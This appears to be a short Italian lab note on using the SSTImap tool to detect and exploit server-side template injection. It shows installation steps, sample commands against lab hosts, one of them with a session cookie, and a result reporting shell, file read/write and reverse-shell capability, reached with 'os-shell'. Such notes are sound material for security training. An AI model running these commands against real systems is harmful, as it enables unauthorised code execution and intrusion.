tags: SSTIMap SSTI SSTI_Automation
Questo strumento automatizza un sacco di payload alla ricerca di una vulnerabilità SSTI, lo puoi scaricare nel seguente modo:
git clone https://github.com/vladko312/SSTImap.git
cd SSTImap
python3 -m venv myenv
source myenv/bin/activate
pip install -r requirements.txt
Richiesta GET
python3 sstimap.py -u http://10.10.129.18:5000/profile/* -iRichiesta POST
Con un solo parametro
python3 sstimap.py -X POST -u 'http://ssti.thm:8002/mako/' -d 'page=' -i
runCon più parametri
python3 sstimap.py -u 'http://ssti.thm:8080/admin/forms/option_lists/edit.php' --data "update_page=1&num_rows=0&option_list_name=New+Option+List+%28746%29&is_grouped=yes&group_name_2947=pannino*&update=Update&option_list_sortable__rows=2947%7C&option_list_sortable__new_groups=&option_list_sortable__deleted_rows=" --cookie "PHPSESSID=ad094f3d803ddaa9e2eeb7676b537d34" -iNel caso restituisse questo risultato:
Body parameter: page
Engine: Python_generic
Injection: ${*}
Context: text
OS: posix-linux
Technique: rendered
Capabilities:
Shell command execution: ok
Bind and reverse shell: ok
File write: ok
File read: ok
Code evaluation: ok, python codeCi basta digitare questo comando per ottenere una reverse shell:
os-shell